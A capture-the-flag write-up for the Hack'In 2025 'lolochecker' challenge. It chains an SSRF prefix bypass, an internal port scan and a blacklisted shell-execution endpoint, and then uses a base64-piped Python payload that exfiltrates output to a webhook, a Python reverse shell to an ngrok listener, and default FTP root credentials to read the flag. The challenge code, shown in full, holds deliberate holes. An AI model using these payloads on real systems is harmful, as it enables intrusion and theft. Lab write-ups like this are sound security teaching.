Writeup lolochecker - Hack'In 2025


Walkthrough
Once the container is deployed, browsing to the root URL shows that there is no index page:

Because we have the source code, the only interesting route we find is /api, with a single endpoint /check-machine:
const express = require("express");
const axios = require("axios");
const router = express.Router();
router.post("/check-machine", async (req, res) => {
    const { hostname } = req.body;
    if (!hostname || typeof hostname !== "string") {
        return res.status(400).json({ error: "Paramètre 'hostname' invalide." });
    }
    const safeHostname = hostname.replace(/[^a-zA-Z0-9.\-:@?=|\/ ]/g, "");
    if (safeHostname.length === 0) {
        return res.status(400).json({ error: "Nom d'hôte invalide après filtrage." });
    }
    // Vérifier que hostname commence bien par  
    if (!safeHostname.startsWith("http://lololekik.com")) {
        return res.status(400).json({ error: "Nom d'hôte invalide." });
    }
    try {
        // L'utilisateur choisit son propre scheme
        
        const response = await axios.get(safeHostname, { timeout: 5000 });
        // print response content
        // Vérification du statut HTTP
        res.json({ exists: response.status >= 200 && response.status < 400, content: response.data });
    } catch (error) {
        res.json({ exists: false, error: error.message });
    }
});
module.exports = router;
The endpoint enforces two conditions:
- The hostname must start with http://lololekik.com
- All characters outside the whitelist are stripped
Providing a simple URL in the hostname parameter returns content:

The challenge notice hints that another internal service is present. We therefore keep the required prefix and append @127.0.0.1:80:

Port scan with Burp Intruder
Sending the request to Intruder and fuzzing the 65535 ports reveals three interesting ones:
- Port 21
- Port 9876
- Port 59876
| Port | Observation | 
|---|---|
| 21 | Parse Error: Expected HTTP/→ looks like FTP | 
| 9876 | 404for/but service exists | 
| 59876 | Web server with a directory listing | 
Port 59876 serves an Index of page:

We find three files:
- requirements.txt
- ftp.py
- web.py
ftp.py contents:
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
# RUN AS ROOT
def start_ftp_server():
    authorizer = DummyAuthorizer()
    # Création d'un utilisateur avec un accès complet à toute la machine
    authorizer.add_user("admin", "password", "/", perm="elradfmw")  
    handler = FTPHandler
    handler.authorizer = authorizer
    # Lancer le serveur sur 0.0.0.0:21
    server = FTPServer(("127.0.0.1", 21), handler)
    
    print("Serveur FTP...")
    server.serve_forever()
if __name__ == "__main__":
    start_ftp_server()
This Python script sets up a local FTP server accessible as admin with full root permissions (elradfmw).
web.py contents:
from flask import Flask, request
import subprocess
app = Flask(__name__)
# RUN AS APPUSER
@app.route('/execute', methods=['GET'])
def execute_command():
    cmd = request.args.get('cmd')
    if not cmd:
        return {"error": "Aucune commande fournie"}, 400
    
    blacklist = ["rm", "shutdown", "reboot", "halt", "poweroff", "init", "kill", "pkill", "pgrep", ".", "top", "htop", "killall", "/", "&&", ";", ">", "<", "cat", "printf", "sed", "awk", "grep", "find", "ls", "cd", "pwd", "touch", "mkdir", "rmdir", "mv", "cp", "ln", "chmod", "chown", "chgrp", "useradd", "userdel", "groupadd", "groupdel", "passwd", "su", "sudo", "chsh", "chfn"]
    for blacklisted_cmd in blacklist:
        if blacklisted_cmd in cmd:
            return {"error": "Commande interdite"}, 403
    try:
        result = subprocess.run(cmd, shell=True, capture_output=False, text=True)
        return {
            "command": cmd,
            "return_code": result.returncode
        }
    except Exception as e:
        return {"error": str(e)}, 500
if __name__ == '__main__':
    app.run(host="0.0.0.0", port=9876, debug=True)
This Flask script exposes an API on port 9876, providing an /execute endpoint allowing shell command execution with certain blacklisted commands.
Querying with an allowed command returns only the status code:

Because there is no output (only the return_code), we need an out-of-band channel. A typical trick is to send a base64-encoded payload and decode it on the target:
echo -n '<base64_payload>' | base64 -d | sh
Using Python in the payload lets us POST the command output to a Pipedream webhook. Below is the final Burp request that exfiltrates the output of id (Hackvertor inserts the <@base64> tags):
{
  "hostname": "http://lololekik.com@127.0.0.1:9876/execute?cmd=echo -n '<@base64>python3 -c 'import subprocess,urllib.request;result=subprocess.check_output(["id"]);urllib.request.urlopen("https://eowwblcn55n3j3s.m.pipedream.net", data=result)'</@base64>' | base64 -d | sh"
}

Getting a reverse shell
Start ngrok and nc, then craft the following payload (which you’ll encode in base64 before sending) to open a socket back to your ngrok listener:
python3 -c 'import socket, subprocess, os; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("7.tcp.eu.ngrok.io", 18483)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); import pty; pty.spawn("/bin/sh")'
The callback lands successfully, reverse shell obtained!

Looting the FTP server
Because the FTP service is running locally and we already know the credentials, a simple login with admin:password gives full read/write access to the system root:

At that point, retrieving the flag is trivial:
ftp> get flag.txt
appuser@f32fb868a34d:/tmp$ cat flag.txt
HNx04{...}
We got first blood on this chall ! 🩸
Thanks to lololekik for the challenge 🤝
